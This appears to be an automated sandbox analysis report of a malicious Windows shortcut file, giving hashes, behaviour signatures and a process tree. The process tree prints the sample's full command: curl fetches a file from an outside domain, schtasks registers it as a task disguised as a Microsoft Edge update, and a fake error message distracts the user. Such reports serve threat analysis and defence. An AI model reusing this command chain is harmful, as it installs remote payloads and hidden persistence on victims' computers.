Resubmissions
06-03-2024 15:01
240306-sdvz9sbf8t 706-03-2024 14:59
240306-sc3cysah54 306-03-2024 14:41
240306-r2taxagc37 7Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
06-03-2024 14:41
Static task
static1
Behavioral task
behavioral1
Sample
414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
Resource
win10v2004-20240226-en
General
-
Target
414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
-
Size
2KB
-
MD5
10f4479d5f531def842a712277ae9611
-
SHA1
bdb075abba517e216a41933cec5b30b4d50c0e76
-
SHA256
414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485
-
SHA512
5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2884 2292 cmd.exe 29 PID 2292 wrote to memory of 2884 2292 cmd.exe 29 PID 2292 wrote to memory of 2884 2292 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\WINDOWS\system32\conhost.exe"C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."2⤵PID:2884
-